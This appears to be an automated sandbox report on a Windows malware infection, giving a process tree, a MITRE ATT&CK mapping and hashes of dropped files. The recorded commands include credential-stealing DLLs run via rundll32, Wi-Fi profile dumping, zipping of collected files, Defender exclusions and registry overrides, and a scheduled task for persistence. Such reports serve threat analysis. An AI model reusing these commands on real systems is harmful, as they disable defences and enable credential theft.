C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:6280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1264 -ip 1264
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5220 -ip 5220
1⤵
PID:7244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5220 -ip 5220
1⤵
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5460 -ip 5460
1⤵
PID:292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5220 -ip 5220
1⤵
PID:2600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5220 -ip 5220
1⤵
PID:5140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7624 -ip 7624
1⤵
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 5220 -ip 5220
1⤵
PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4480 -ip 4480
1⤵
PID:7344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5064 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5220 -ip 5220
1⤵
PID:2248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=5952 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:5352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4576 -ip 4576
1⤵
PID:5896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=6112 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:6136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=6220 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1
1⤵
PID:7832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6472 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8
1⤵
PID:2944

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
1⤵
PID:7564
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 532
  2⤵
  - Program crash
  PID:7612
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 548
  2⤵
  - Program crash
  PID:7716
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 548
  2⤵
  - Program crash
  PID:5820
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 664
  2⤵
  - Program crash
  PID:6520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 480
  2⤵
  - Program crash
  PID:4748
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 720
  2⤵
  - Program crash
  PID:2520
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 864
  2⤵
  - Program crash
  PID:5816
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 860
  2⤵
  - Program crash
  PID:3928
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 944
  2⤵
  - Program crash
  PID:5956
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1132
  2⤵
  - Program crash
  PID:7032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1156
  2⤵
  - Program crash
  PID:6560
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1396
  2⤵
  - Program crash
  PID:6552
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1396
  2⤵
  - Program crash
  PID:1912
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1544
  2⤵
  - Program crash
  PID:7712
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
  2⤵
  PID:904
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
    3⤵
    PID:4076
  - - C:\Windows\system32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
      4⤵
      PID:7548
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:1912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
        5⤵
        
        PID:5296
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
  2⤵
  PID:6488
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
    3⤵
    PID:4456
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1096
  2⤵
  - Program crash
  PID:968
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1464
  2⤵
  - Program crash
  PID:1592
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1416
  2⤵
  - Program crash
  PID:6824
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7564 -s 1724
  2⤵
  - Program crash
  PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7564 -ip 7564
1⤵
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 7564 -ip 7564
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2316 -ip 2316
1⤵
PID:6352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 7668 -ip 7668
1⤵
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7564 -ip 7564
1⤵
PID:3804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 7564 -ip 7564
1⤵
PID:6296

C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7564 -ip 7564
1⤵
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7564 -ip 7564
1⤵
PID:3436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7564 -ip 7564
1⤵
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4340 -ip 4340
1⤵
PID:5464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3532 -ip 3532
1⤵
PID:5376

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
1⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 7564 -ip 7564
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7896 -ip 7896
1⤵
PID:2760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7564 -ip 7564
1⤵
PID:4608

C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
1⤵
PID:7096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7564 -ip 7564
1⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4740 -ip 4740
1⤵
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7564 -ip 7564
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7120 -ip 7120
1⤵
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7564 -ip 7564
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7484 -ip 7484
1⤵
PID:884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7564 -ip 7564
1⤵
PID:4068

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:7300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  PID:7540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7564 -ip 7564
1⤵
PID:6728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7564 -ip 7564
1⤵
PID:3820

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:5740
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    3⤵
    PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7564 -ip 7564
1⤵
PID:3032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3028 -ip 3028
1⤵
PID:5096

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x510 0x4ec
1⤵
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 7564 -ip 7564
1⤵
PID:7920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7564 -ip 7564
1⤵
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7564 -ip 7564
1⤵
PID:6520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7564 -ip 7564
1⤵
PID:5712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7564 -ip 7564
1⤵
PID:7516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7564 -ip 7564
1⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\EwRHKNu.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\EwRHKNu.exe my /hqsite_idSkH 385118 /S
1⤵
PID:5584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:6084

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\EwRHKNu.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\EwRHKNu.exe my /hqsite_idSkH 385118 /S
1⤵
PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7564 -ip 7564
1⤵
PID:1236

C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
1⤵
PID:5124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7564 -ip 7564
1⤵
PID:1360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7564 -ip 7564
1⤵
PID:1744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7564 -ip 7564
1⤵
PID:7688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7564 -ip 7564
1⤵
PID:8060

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{60A90A2F-858D-42AF-8929-82BE9D99E8A1}
1⤵
PID:5900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5136 -ip 5136
1⤵
PID:3892

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\3eb19ed1b99f4e979b58752c3781bb11 /t 6568 /p 1800 5824
1⤵
PID:7700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7564 -ip 7564
1⤵
PID:7672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 7564 -ip 7564
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7564 -ip 7564
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2848 -ip 2848
1⤵
PID:2212

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Programs\Opera\ASSIST~1\ASSIST~1.EXE" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=0
1⤵
PID:6176

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:4080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 7564 -ip 7564
1⤵
PID:7376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 6664 -ip 6664
1⤵
PID:7316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7564 -ip 7564
1⤵
PID:7260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7564 -ip 7564
1⤵
PID:5700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:6332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 7564 -ip 7564
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7564 -ip 7564
1⤵
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7564 -ip 7564
1⤵
PID:2096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7564 -ip 7564
1⤵
PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4836 -ip 4836
1⤵
PID:4992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 7564 -ip 7564
1⤵
PID:1132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\AppV\Setup\@[email protected]

Filesize
1KB

MD5
3146a71c0a4e9e6d2e63c9e18e6f68f7

SHA1
544701060e304cdc0c37879835a96aab3f93824e

SHA256
ed2df99b8d657d97d22ce1dff036680760cf2f444a317f156a47d8afbb052557

SHA512
b06ed69fe24bb97ab9daac24cef0df793137f610e2f6487b9103e8678b2db07269e615062d22db4f54e61804bc2d0c05a45b2d80a105ef321b940d875aa33d1f

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\system.exe

Filesize
37KB

MD5
e817d74d13c658890ff3a4c01ab44c62

SHA1
bf0b97392e7d56eee0b63dc65efff4db883cb0c7

SHA256
2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d

SHA512
8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
66ec76061c665fe918233f7f1628de78

SHA1
eeba0c82b27fa3da93edafaa8283266824e67af4

SHA256
de8af07999bb2c638d03c4e2b6696d12fbab44a2739572b40b0af2c247594882

SHA512
579f8658c51bc841c88e15b4051999e6a4948a6278c1a05b5bbcd9e8cbac25de03ee13b692ebd58a1ed61c3c6c1ddd6cce5e69dd7c64c458de269b2034ecd351

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
9e9aa856386202852f2c6c28098f7dbb

SHA1
8a14b4cd83c257fe0ebfee37de87c35a478a93a9

SHA256
8ede046e502582b61ab1eea970acba9f5dbdc7450df28263288cf606f7d1a9bd

SHA512
cdd2bc90cf81bacd960ac91027151af792313464e052cf1da121ddd3ba39bb67e270b7f61d57b55b0533707603e375124d6a3b23cb6907de0dc5ef46775f6ea3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a1e30a4987a02da137ca1cc00b63c0f4

SHA1
8cf1b663f88aae6d0787c052a52ef81b910cb10e

SHA256
056fdf988fd98aa803f99afd76843a7f970d53549dbf1c4a081f2389f94821ae

SHA512
184818ec7ee5a53f32e512423e542c4f32570388548705849b8c6c95d824c81ff2a2d4fa1f71ffd174d2dc16540e463b130946ba341076b2daed2c37c3c66bdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
9fe8d4e2faf285902ff3a3b3b8e6deea

SHA1
d1e7185c84a3f4f5b693c431bb48d2f39065db93

SHA256
2e504c09eb2f9176442ad1fde810d761bc4c66a822f71350c6445d0f841ea065

